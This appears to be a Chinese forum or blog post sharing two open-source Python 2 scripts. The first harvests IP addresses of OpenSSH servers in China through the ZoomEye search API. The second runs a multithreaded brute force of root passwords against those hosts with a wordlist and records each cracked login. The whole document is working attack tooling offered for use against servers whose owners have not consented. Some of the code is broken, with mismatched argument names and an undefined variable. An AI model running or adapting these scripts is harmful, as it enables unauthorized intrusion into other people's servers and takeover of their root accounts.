多线程SSH远程登陆爆破脚本，开源

import os
import requests
import json
access_token = ''
ip_list = []
def login():
"""
输入用户米密码 进行登录操作
:return: 访问口令 access_token
"""
user = raw_input('[-] input : username :')
passwd = raw_input('[-] input : password :')
data = {
'username' : user,
'password' : passwd
}
data_encoded = json.dumps(data) # dumps 将 python 对象转换成 json 字符串
try:
r = requests.post(url = 'https://api.zoomeye.org/user/login',data = data_encoded)
r_decoded = json.loads(r.text) # loads() 将 json 字符串转换成 python 对象
global access_token
access_token = r_decoded['access_token']
except Exception,e:
print '[-] info : username or password is wrong, please try again '
exit()
def saveStrToFile(file,str):
"""
将字符串写如文件中
:return:
"""
with open(file,'w') as output:
output.write(str)
def saveListToFile(file,list):
"""
将列表逐行写如文件中
:return:
"""
s = '\n'.join(list)
with open(file,'w') as output:
output.write(s)
def apiTest():
"""
进行 api 使用测试
:return:
"""
page = 1
global access_token
with open('access_token.txt','r') as input:
access_token = input.read()
# 将 token 格式化并添加到 HTTP Header 中
headers = {
'Authorization' : 'JWT ' + access_token,
}
# print headers
while(True):
try:
r = requests.get(url = 'https://api.zoomeye.org/host/search?query=port:22%20country:cn%20product:OpenSSH&page=' + str(page),
headers = headers)
r_decoded = json.loads(r.text)
# print r_decoded
# print r_decoded['total']
for x in r_decoded['matches']:
print x['ip']
ip_list.append(x['ip'])
print '[-] info : count ' + str(page * 10)
except Exception,e:
# 若搜索请求超过 API 允许的最大条目限制 或者 全部搜索结束，则终止请求
if str(e.message) == 'matches':
print '[-] info : account was break, excceeding the max limitations'
break
else:
print '[-] info : ' + str(e.message)
else:
if page == 500:
break
page += 1
def main():
# 访问口令文件不存在则进行登录操作
if not os.path.isfile('access_token.txt'):
print '[-] info : access_token file is not exist, please login'
login()
saveStrToFile('access_token.txt',access_token)
apiTest()
saveListToFile('ip_list.txt',ip_list)
if __name__ == '__main__':
main()

import threading
import Queue
import time
import sys
import MySQLdb
import threading
from argparse import ArgumentParser
import paramiko
import os
import socket
from pexpect import pxssh
class _Thread(threading.Thread):
def __init__(self,workQueue,timeout=1,**kwargs):
threading.Thread.__init__(self,kwargs=kwargs)
#self.func_result = 0
self.workQueue = workQueue
self.timeout = timeout
self.setDaemon(True)
#self.start()
def run(self):
while True:
try:
callable,args,kwds = self.workQueue.get(timeout=self.timeout)
res = callable(*args,**kwds)
#print self.getName()
except Queue.Empty:
break
except :
print sys.exc_info()
raise
#def get_func_result(self):
# return self.func_result
class threadPOOL():
def __init__(self,num_thread=10):
self.workQueue = Queue.Queue()
self.threads=[]
self.__createThreadPool(num_thread)
def __createThreadPool(self,num_thread):
for i in range(num_thread):
thread = _Thread(self.workQueue)
#print thread.get_func_result()
self.threads.append(thread)
def waite_all_complete(self):
while len(self.threads):
thread = self.threads.pop()
if thread.isAlive():
thread.join()
def start(self):
for th in self.threads:
th.start()
def add_job(self,callable,*args,**kwds):
self.workQueue.put((callable,args,kwds))
class Fuck_SSH():
def __init__(self):
self.result_code = None
def bruteforce_ssh_faile(self,ip,password):
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
print "Now is cracking:\t"+ip+":"+password+"...."
ssh.connect(ip,port=22,username='root',password=password,timeout=10)
print "+++++++++++++++++++++++++++++++++"
xxoo = "++Success: cracked !! \t"+"IP:\t"+ip+"\tusername= root \tpassword= "+" ["+password+"]"+"\n"
print xxoo
print "+++++++++++++++++++++++++++++++++"
#self.result_code = 1
success_file.write(xxoo)
success_file.flush()
oscmd = "echo "+xxoo+" >>Success"
os.system(oscmd)
os.fsync(fileObj)
ssh.close()
except paramiko.AuthenticationException,e:
#print "[*] Authentication Failed...."
pass
except socket.error,e:
#print "[*] Connection Failed...Host ShutDown"
self.result_code = 'x'
print e
pass
#return 120
def bruteforce_ssh(self,ip,password):
try:
print "Now is cracking:\t"+ip+":"+password+"...."
sss = pxssh.pxssh()
sss.login(ip,'root',password)
print "+++++++++++++++++++++++++++++++++"
xxoo = "[*]Success: cracked !! \t"+"IP:\t"+ip+"\tusername= root \tpassword= "+" ["+password+"]"
print xxoo+"\n"
print "+++++++++++++++++++++++++++++++++"
#self.result_code = 1
success_file.write(xxoo+"\n")
oscmd = "echo "+xxoo+" >>Success"
print oscmd
os.system(oscmd)
success_file.flush()
os.fsync(success_file)
sss.close()
except Exception,e:
print "[*]Connect Fail...."+ip+":"+password
def test(iplist,passlist,threads_num):
tp =threadPOOL(num_thread=int(threads_num))
ip_lines = iplist.readlines()
pass_lines = passlist.readlines()
dd = Fuck_SSH()
for ip in ip_lines:
for passwd in pass_lines:
#print 'xxx'
tp.add_job(dd.bruteforce_ssh,ip.strip(),passwd.strip())
tp.start()
tp.waite_all_complete()
if __name__=="__main__":
global success_file
p = ArgumentParser(usage='SSH root brute force ',description='just test root ')
p.add_argument('-p',help='SSH password list file')
p.add_argument('-t',help='target SSH ip list file')
p.add_argument('-x',default=6,help='Number of thread')
p.add_argument('-o',help='success crack result file')
args = p.parse_args()
#print args
pass_file = open(args.pL,'r+')
ip_list = open(args.tL,'r')
numthread = args.x
success_file = open(args.o,'w')
test(ip_list,pass_file,numthread)
pass_file.close()
ip_list.close()
success_file.close()
print "Crack Done!!"